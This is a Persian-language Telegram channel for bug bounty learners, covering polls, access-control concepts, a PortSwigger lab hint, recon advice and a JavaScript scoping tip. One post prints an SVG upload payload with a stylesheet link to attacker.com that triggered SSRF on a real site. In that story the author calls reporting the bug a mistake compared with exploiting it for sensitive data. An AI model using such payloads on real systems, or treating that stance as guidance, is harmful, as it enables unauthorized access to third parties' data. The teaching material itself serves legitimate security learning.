دوست دارین بیشتر راجب کدوم باگ ها اطلاعات بدیم ؟
Anonymous Poll
45%
Client-side (Xss,...)
55%
Server-side (Ssrf,...)
میخوام راجب هر باگی که شد و علاقه داشتید
براتون رایتاپ هاشو بخونم و خلاصشو اینجا بهتون توضیح بدم و بگم از چه متودولوژیی استفاده کرده و چکارا کرده که تونسته به سیستم نفوذ کنه و چجوری باگ رو از p4 تبدیل کرده به p2 و یا p1 !
براتون رایتاپ هاشو بخونم و خلاصشو اینجا بهتون توضیح بدم و بگم از چه متودولوژیی استفاده کرده و چکارا کرده که تونسته به سیستم نفوذ کنه و چجوری باگ رو از p4 تبدیل کرده به p2 و یا p1 !
🔥4❤1
یه سری ابزار ها هستند معروف نیستن ولی یک هکر با خلاقت و یادگیری ک خودش داشته این ابزاروهارو کاستوم کرده ، اکثرشون بدرد نمیخورن ولی یه سریاشون واقعه فوق العادن!
یکی از اونا این ابزاره:
-X-Snifer🔥
اصلا نیاز به توضیح من نداره عکس باز کنید کارایی که میتونه انجام بده و نوشته 🔥☄️
اطلاعات بیشتر و نصبش از لینک گیتهابش میتونید بخونید و استفاده کنید :
🌐 : https://github.com/Whomrx666/X-snifer
یکی از اونا این ابزاره:
-X-Snifer🔥
اصلا نیاز به توضیح من نداره عکس باز کنید کارایی که میتونه انجام بده و نوشته 🔥☄️
اطلاعات بیشتر و نصبش از لینک گیتهابش میتونید بخونید و استفاده کنید :
🌐 : https://github.com/Whomrx666/X-snifer
🔥2
یکی اومده میگه من باگ بانتی کار میکنم (یعنی باگ گزارش میده پول میگیره) پرسیده آیا هوش مصنوعی باعث از بین رفتن شغلمون میشه؟ نه عزیزم هوش مصنوعی اتفاقا شغل شمارو رونق میده، کد ها همه باگی قراره بشن.
@BugBountySource />
@BugBountySource />
🔥2
وقتی اولین باگم رو گرفتم به شدت هیجان زده شدم و باعث شد یک اشتباه خیلی بزرگ بکنم!
عکس بالارو ببینید !
داخل یک وبسایت میتونستم برای پروفایلم عکس بزارم.خب تا اینجا که مشکلی نداره ! تست کردم ببینم چه فرمت هایی قبول میکنه SVG , PNG , JPEG دیدم عههه چ جالب فرمت SVG هم قبول میکنه و انگار برنامه نویس یادش رفته این فرمت فیلتر کنه !
چی از این بهتر؟؟؟ یک فایل SVG بیسیک ولی با لینک دامین خودم داخلش روی پروفایلم آپلود کردم دیدم سرور وبسایت طرف داره درخواست DNS , HTTP میزنه !!! من بعد از مدت هااا یک باگ SSRF پیدا کردههههه بودم ! ولی یک اشتباه خیلی بزرگ و آماتوریی کردم ، بجای اکسپلوییت کردنش و دسترسی به دادهای حساس اون وبسایت این باگ گزارش دادم و نتیجش شد عکس بالا :) حداقل 2000 هزار دلار از دستم رفت و این گزارشم باگ p5 بهش خورد و بانتیی بهم ندادن !َ
اگر برنامه نویس وب و یا امنیت وب کار میکنی وارد کانالم شو چون قراره بهترین تریک ها و بهترین تجربه هارو باهم به اشتراک بزاریم :)♡
عکس بالارو ببینید !
داخل یک وبسایت میتونستم برای پروفایلم عکس بزارم.خب تا اینجا که مشکلی نداره ! تست کردم ببینم چه فرمت هایی قبول میکنه SVG , PNG , JPEG دیدم عههه چ جالب فرمت SVG هم قبول میکنه و انگار برنامه نویس یادش رفته این فرمت فیلتر کنه !
چی از این بهتر؟؟؟ یک فایل SVG بیسیک ولی با لینک دامین خودم داخلش روی پروفایلم آپلود کردم دیدم سرور وبسایت طرف داره درخواست DNS , HTTP میزنه !!! من بعد از مدت هااا یک باگ SSRF پیدا کردههههه بودم ! ولی یک اشتباه خیلی بزرگ و آماتوریی کردم ، بجای اکسپلوییت کردنش و دسترسی به دادهای حساس اون وبسایت این باگ گزارش دادم و نتیجش شد عکس بالا :) حداقل 2000 هزار دلار از دستم رفت و این گزارشم باگ p5 بهش خورد و بانتیی بهم ندادن !َ
اگر برنامه نویس وب و یا امنیت وب کار میکنی وارد کانالم شو چون قراره بهترین تریک ها و بهترین تجربه هارو باهم به اشتراک بزاریم :)♡
🔥4😁2🤔1🤯1
BugBountySource | امنیت وب
وقتی اولین باگم رو گرفتم به شدت هیجان زده شدم و باعث شد یک اشتباه خیلی بزرگ بکنم! عکس بالارو ببینید ! داخل یک وبسایت میتونستم برای پروفایلم عکس بزارم.خب تا اینجا که مشکلی نداره ! تست کردم ببینم چه فرمت هایی قبول میکنه SVG , PNG , JPEG دیدم عههه چ جالب فرمت…
<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<link xmlns="http://www.w3.org/1999/xhtml" rel="stylesheet" href="http://attacker.com/style.css" type="text/css"/>
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
</svg>
این payload که ازش استفاده کردم و باعث شد باگ ssrf بخوره!
🔥3👏1🏆1
باگ های Broken access control مثل یک گنجینه برای هکراست ! و میدونی بدیه این باگ چیه؟؟؟
بیشترین احتمال پیدا کردن یک باگ در وبسایت ها Broken access control هستش ، دلیلیشم واضحه : برنامه نویسا به شدت اشتباه میکنن !
دسترسی کامل به حساب های یوزر های یک وبسایت ، دسترسی کامل به حساب ادمین یک وبسایت فقط بخش کوچیکی از تبعات پیدا کردن این باگ داخل یک وبسایته !
پستای بعدی حسابی میخوایم راجب این باگ صحبت کنیم و اگر شد یه نمونه واقعیشو هم باهم تست میکنیم 🔥
بیشترین احتمال پیدا کردن یک باگ در وبسایت ها Broken access control هستش ، دلیلیشم واضحه : برنامه نویسا به شدت اشتباه میکنن !
دسترسی کامل به حساب های یوزر های یک وبسایت ، دسترسی کامل به حساب ادمین یک وبسایت فقط بخش کوچیکی از تبعات پیدا کردن این باگ داخل یک وبسایته !
پستای بعدی حسابی میخوایم راجب این باگ صحبت کنیم و اگر شد یه نمونه واقعیشو هم باهم تست میکنیم 🔥
🔥2👏1
BugBountySource | امنیت وب
باگ های Broken access control مثل یک گنجینه برای هکراست ! و میدونی بدیه این باگ چیه؟؟؟ بیشترین احتمال پیدا کردن یک باگ در وبسایت ها Broken access control هستش ، دلیلیشم واضحه : برنامه نویسا به شدت اشتباه میکنن ! دسترسی کامل به حساب های یوزر های یک وبسایت…
خب اصلا بیایم ببینیم داستان این باگ چیه و چ داستانیی پشتشه که اینقدر خطرناک و پرتکراره !
فرض کنید من قراره برم داخل بانک و جلوی این بانک یک نگهبان ایستاده ، قبل از ورود من به بانک باید از من یک کارت مخصوص همون بانک بگیره تا منو بشناسه و بزاره برم داخل بانک ، من بجای کارت بانکی کارت دانشجوییم بهش نشون میدم و اون میگه بفرما داخل به بانک خوش آمدید !
به همین راحتی میتونم به بانک ورود کنم و هرکار دلم خواست بکنم بدون اینکه احراز هویت جلوم رو بگیره !
تا اینجای کار این مثال رو داشته باشید و بهش فکر کنید و جایگزینش کنید با اطلاعات و نقش هایی ک از یک
وبسایت میدونید...
پست بعدی سه اصل مهم راجب این باگ براتون مثال میزنم تا حتی اونی که دانش صفرم از این مسائل داره متوجه شه این باگ دقیقا چی هستش 🔥
این کانال رو دنبال کن قراره کلی تِریک و تجربه داخلش اشتراک بزاریم ⚜🍻
فرض کنید من قراره برم داخل بانک و جلوی این بانک یک نگهبان ایستاده ، قبل از ورود من به بانک باید از من یک کارت مخصوص همون بانک بگیره تا منو بشناسه و بزاره برم داخل بانک ، من بجای کارت بانکی کارت دانشجوییم بهش نشون میدم و اون میگه بفرما داخل به بانک خوش آمدید !
به همین راحتی میتونم به بانک ورود کنم و هرکار دلم خواست بکنم بدون اینکه احراز هویت جلوم رو بگیره !
تا اینجای کار این مثال رو داشته باشید و بهش فکر کنید و جایگزینش کنید با اطلاعات و نقش هایی ک از یک
وبسایت میدونید...
پست بعدی سه اصل مهم راجب این باگ براتون مثال میزنم تا حتی اونی که دانش صفرم از این مسائل داره متوجه شه این باگ دقیقا چی هستش 🔥
این کانال رو دنبال کن قراره کلی تِریک و تجربه داخلش اشتراک بزاریم ⚜🍻
🔥4👏2❤1🏆1
چیزی که باعث میشه یک هکر انگیزه اینو بگیره که یک سیستم یا وبسایت نابود کنه و یا تست نفوذ روش بزنه بخشیش پوله ، و یک بخشه جالبیش ، حس رقابت با برنامه نویساس ، من خودم به شخصه روی پروگرم که کار میکنم اصلا توی کَتَم نمیره یک برنامه نویس کدش امن باشه و من هرجور شده باید شکستش بدم 😄
این هم انگیزه برای برنامه نویسه و هم برای هانتر!
من عاشق برنامه نویسیم که به امنیت کدش اهمیت نمیده و از هوش مصنوعی برای نوشتن کدش استفاده میکنه ! همین درسته 👌
نظر تو به عنوان برنامه نویس چیه :)؟
این هم انگیزه برای برنامه نویسه و هم برای هانتر!
من عاشق برنامه نویسیم که به امنیت کدش اهمیت نمیده و از هوش مصنوعی برای نوشتن کدش استفاده میکنه ! همین درسته 👌
نظر تو به عنوان برنامه نویس چیه :)؟
😁4👍2👎1👏1
کدوم bypass براتون جذاب تره تا مفصل باهم نقد برسیش کنیم و روش هاشو تست کنیم؟
Anonymous Poll
38%
Authentication Bypass
24%
Authorization Bypass
23%
WAF Bypass
22%
Rate Limit Bypass
29%
Captcha Bypass
29%
2FA / MFA Bypass
29%
Subscription / Plan Bypass
BugBountySource | امنیت وب
خب اصلا بیایم ببینیم داستان این باگ چیه و چ داستانیی پشتشه که اینقدر خطرناک و پرتکراره ! فرض کنید من قراره برم داخل بانک و جلوی این بانک یک نگهبان ایستاده ، قبل از ورود من به بانک باید از من یک کارت مخصوص همون بانک بگیره تا منو بشناسه و بزاره برم داخل…
بیایم پرونده این باگ ببندیم و کاملش کنیم 🔥
Access control bugs :
این باگ از سه اصل مهم پیروی میکنه سه اصلی ک حداقل یکیشون داخل یک وبسایت رندوم میتونی پیدا کنی (اکثریت) !
(توضیحاتی که راجب این باگ بهتون میدم مختصر و مفیدترین حالت ممکنه ، برای اطلاعات بیشتر تحقیق کنید)
1.Vertical access controls :
یک کاربر با سطح دسترسی پایین (Display) به سطح دسترسی بالا برسد ( Admin ) !
2.Horizontal access controls :
یک کاربر (user1) به اطلاعات و امکانات کاربر دیگر (user2) با همان سطح ، دسترسی پیدا کند!
3.Context-dependent access controls :
بسته به موقعیت و شرایط خاص کاربر ، کاربر بتونه از این شرایط بیرون بیاد و دورشون بزنه .
این باگ از سه اصل مهم پیروی میکنه سه اصلی ک حداقل یکیشون داخل یک وبسایت رندوم میتونی پیدا کنی (اکثریت) !
(توضیحاتی که راجب این باگ بهتون میدم مختصر و مفیدترین حالت ممکنه ، برای اطلاعات بیشتر تحقیق کنید)
1.Vertical access controls :
یک کاربر با سطح دسترسی پایین (Display) به سطح دسترسی بالا برسد ( Admin ) !
2.Horizontal access controls :
یک کاربر (user1) به اطلاعات و امکانات کاربر دیگر (user2) با همان سطح ، دسترسی پیدا کند!
3.Context-dependent access controls :
بسته به موقعیت و شرایط خاص کاربر ، کاربر بتونه از این شرایط بیرون بیاد و دورشون بزنه .
🔥6🤨2❤1👏1
BugBountySource | امنیت وب
بیایم پرونده این باگ ببندیم و کاملش کنیم 🔥 Access control bugs : این باگ از سه اصل مهم پیروی میکنه سه اصلی ک حداقل یکیشون داخل یک وبسایت رندوم میتونی پیدا کنی (اکثریت) ! (توضیحاتی که راجب این باگ بهتون میدم مختصر و مفیدترین حالت ممکنه ، برای اطلاعات بیشتر…
از امشب میخوایم تمام مراحل ، از مبتدی تا حرفه ای ، نفوذ به وبسایت هارو با این استفاده از باگ های access control تمرین کنیم ...
از بیسیک ترین حالت ممکن تا حرفه ای ...
هرشب یک مرحله با توضیح کامل راجب این مرحله 🔥
مارو به دوستاتون که علاقه به امنیت وب دارن معرفی کنید تا اونام استفاده کنن
بعد از اتمام این مراحل میریم سراغ bypass ها که توی نظرسنجی بالا شرکت کردید♥️
از بیسیک ترین حالت ممکن تا حرفه ای ...
هرشب یک مرحله با توضیح کامل راجب این مرحله 🔥
مارو به دوستاتون که علاقه به امنیت وب دارن معرفی کنید تا اونام استفاده کنن
بعد از اتمام این مراحل میریم سراغ bypass ها که توی نظرسنجی بالا شرکت کردید♥️
❤🔥9⚡3🆒1
BugBountySource | امنیت وب
از امشب میخوایم تمام مراحل ، از مبتدی تا حرفه ای ، نفوذ به وبسایت هارو با این استفاده از باگ های access control تمرین کنیم ... از بیسیک ترین حالت ممکن تا حرفه ای ... هرشب یک مرحله با توضیح کامل راجب این مرحله 🔥 مارو به دوستاتون که علاقه به امنیت وب دارن…
خب میریم سراغ بیسیک ترین حالت ممکن باگ access control
همینجور ک عکس بالارو میبینید این یه LAB ( آزمایشگاه ) هستش ، یه سری توضیحات خودش بهمون داده...
اول از موضوع شروع میکنیم :
قابلیتهای ادمین بدون هیچ محافظتی
خب تا اینجا خودش داره بهمون میگه اصلا داستان چیه ، من میتونم قابلیت های یک ادمین بدون محدودیت دسترسی بگیرم ،
خب حالا چجوری؟؟؟؟
توضیحات زیرش :
این لابراتوار یه پنل ادمین داره که محافظت نشده.
برای حل کردن این لاب، باید کاربر carlos رو حذف کنی.
https://portswigger.net/web-security/access-control/lab-unprotected-admin-functionality
بیوفتین داخلش و سعی کنید حلش کنید و اگر بخاطر خودتونم شده از hint خوده وبسایت یا هوش مصنوعی برای حلش استفاده نکنید
ببینید چجوری میتونید به پنل ادمین دسترسی پیدا کنید و carlos حذف کنید🔥
❗️یک راهنمایی کوچیک :
داخل وبسایت یک فایل به اسم robots.txt وجود داره که داخلش اطلاعات حساس قرار داره...
30 دقیقه دیگه جوابش با توضیحات میزاریم
همینجور ک عکس بالارو میبینید این یه LAB ( آزمایشگاه ) هستش ، یه سری توضیحات خودش بهمون داده...
اول از موضوع شروع میکنیم :
قابلیتهای ادمین بدون هیچ محافظتی
خب تا اینجا خودش داره بهمون میگه اصلا داستان چیه ، من میتونم قابلیت های یک ادمین بدون محدودیت دسترسی بگیرم ،
خب حالا چجوری؟؟؟؟
توضیحات زیرش :
این لابراتوار یه پنل ادمین داره که محافظت نشده.
برای حل کردن این لاب، باید کاربر carlos رو حذف کنی.
https://portswigger.net/web-security/access-control/lab-unprotected-admin-functionality
بیوفتین داخلش و سعی کنید حلش کنید و اگر بخاطر خودتونم شده از hint خوده وبسایت یا هوش مصنوعی برای حلش استفاده نکنید
ببینید چجوری میتونید به پنل ادمین دسترسی پیدا کنید و carlos حذف کنید🔥
❗️یک راهنمایی کوچیک :
داخل وبسایت یک فایل به اسم robots.txt وجود داره که داخلش اطلاعات حساس قرار داره...
30 دقیقه دیگه جوابش با توضیحات میزاریم
❤🔥2🤔1
BugBountySource | امنیت وب
خب میریم سراغ بیسیک ترین حالت ممکن باگ access control همینجور ک عکس بالارو میبینید این یه LAB ( آزمایشگاه ) هستش ، یه سری توضیحات خودش بهمون داده... اول از موضوع شروع میکنیم : قابلیتهای ادمین بدون هیچ محافظتی خب تا اینجا خودش داره بهمون میگه اصلا داستان…
این مرحله تنها نکته خاصی ( که در آینده به شدت کمکتون میکنه اگر ملکه ذهنتون کنید ) اینه که شما میتونید از جاهایی که همه فکر میکنن بی ارزشه و اطلاعات خاصی نیست به endpoint های مهم اون وبسایت بریسید !
توی مراحل بعدی حتی از response یک پاسخ به شدت معمولی یک سری اطلاعات فوق العاده مهم استخراج میکنیم!
به عنوان یک هانتر و یک هکر ، باید جاهایی رو ببینی که بقیه بهش اهمیت نمیدن ، اونجا دقیقا در ورود تو به سیستم هستش !
توی مراحل بعدی حتی از response یک پاسخ به شدت معمولی یک سری اطلاعات فوق العاده مهم استخراج میکنیم!
به عنوان یک هانتر و یک هکر ، باید جاهایی رو ببینی که بقیه بهش اهمیت نمیدن ، اونجا دقیقا در ورود تو به سیستم هستش !
👌4👏2
توی این ۱۴۴ نفر چند نفر دارن به صوزت جدی هانت دنبال میکنن و میخوان شغلشون باشه؟ صادقانه بزنید ببینم میشه باهم یه همکاری ایجاد کرد و یک وبسایت هدف بگیریم و روش کار کنیم؟؟؟؟
Anonymous Poll
30%
هانت فقط در حد رویا پردازی توی ذهنه
44%
هنوز اولاشم و دارم مباحث پایه یاد میگیرم
7%
به جایه متوسطی از آموزش رسیدم و حداقل باگارو بلدم
11%
دارم سعی میکنم با دانشم اولین باگم رو بگیرم
9%
اولین باگ هم رو گرفتم و دارم پر قدرت پیش میرم
نوبتیم باشه نوبته Recon که راجبش توضیح بدیم!
ریکان یعنی همون جمع اوری اطلاعات راجب تارگت از ساب دامین ها تا حتی اطلاعات مالک و برنامه نویسای اون تارگت ...
۷۰ درصد هانت ریکان هستش !
جمع اوری اطلاعات راجب تارگت به شدت مهمه چون وبسایت ها دائم درحال بروز شدن و تغییر هستن. قاعدتا شما وقتی وارد صفحه اصلی Target.com میشید ، تمام باگاش گرفته شده و چون صفحه اصلی هستش کمتر میشه باگ مناسبی ازش پیدا کرد ولی وقتی فرایند ریکان انجام میدیم به هزاران فایل js و اندپوینت ها و ساب دامین های جالب برمیخوریم ک هر کدوم در ورود ما به اون وبسایته :)
در اینده فرایند ریکان بهتون توضیح میدم و چندتا ابزار به شدت قوی و مناسب هم آموزش میدیم ...
ریکان یعنی همون جمع اوری اطلاعات راجب تارگت از ساب دامین ها تا حتی اطلاعات مالک و برنامه نویسای اون تارگت ...
۷۰ درصد هانت ریکان هستش !
جمع اوری اطلاعات راجب تارگت به شدت مهمه چون وبسایت ها دائم درحال بروز شدن و تغییر هستن. قاعدتا شما وقتی وارد صفحه اصلی Target.com میشید ، تمام باگاش گرفته شده و چون صفحه اصلی هستش کمتر میشه باگ مناسبی ازش پیدا کرد ولی وقتی فرایند ریکان انجام میدیم به هزاران فایل js و اندپوینت ها و ساب دامین های جالب برمیخوریم ک هر کدوم در ورود ما به اون وبسایته :)
در اینده فرایند ریکان بهتون توضیح میدم و چندتا ابزار به شدت قوی و مناسب هم آموزش میدیم ...
❤5💯2
سوالایی که ذهنتون درگیر کرده
راجب هانت
تست نفوذ
شاخه های امنیت
زبان های برنامه نویسی
و هرچی ک مربوط به امنیت و کامپیوتر هستش بپرسید
تاجایی اطلاعات داشته باشم تجربه هامو باهاتون به اشتراک میزارم 👇
راجب هانت
تست نفوذ
شاخه های امنیت
زبان های برنامه نویسی
و هرچی ک مربوط به امنیت و کامپیوتر هستش بپرسید
تاجایی اطلاعات داشته باشم تجربه هامو باهاتون به اشتراک میزارم 👇
🔥4🙏1
BugBountySource | امنیت وب pinned «سوالایی که ذهنتون درگیر کرده راجب هانت تست نفوذ شاخه های امنیت زبان های برنامه نویسی و هرچی ک مربوط به امنیت و کامپیوتر هستش بپرسید تاجایی اطلاعات داشته باشم تجربه هامو باهاتون به اشتراک میزارم 👇»
به عنوان یه برنامه نویس جاواسکریپت میدونستی اگر :
اگه بدون کلمه کلیدی (const ،let ،var )متغیر تعریف کنی، به محدوده گلوبال میره،
یعنی تو آبجکت window مرورگر ذخیره میشه و همه کدها بهش دسترسی دارن. این بده ، چون میتونه باعث تداخل یا باگ امنیتی بشه.
مثال براتون بزنم :
•این یعنی هر کدی تو مرورگر میتونه به age دسترسی پیدا کنه، که اگه داده حساس باشه خطرناکه. مثلا، یه اسکریپت مخرب میتونه متغیرهای گلوبال رو بخونه یا تغییر بده.
اگه بدون کلمه کلیدی (const ،let ،var )متغیر تعریف کنی، به محدوده گلوبال میره،
یعنی تو آبجکت window مرورگر ذخیره میشه و همه کدها بهش دسترسی دارن. این بده ، چون میتونه باعث تداخل یا باگ امنیتی بشه.
مثال براتون بزنم :
age = 25;
console.log(age);
console.log(window.age);
•این یعنی هر کدی تو مرورگر میتونه به age دسترسی پیدا کنه، که اگه داده حساس باشه خطرناکه. مثلا، یه اسکریپت مخرب میتونه متغیرهای گلوبال رو بخونه یا تغییر بده.
❤7👏2🍓1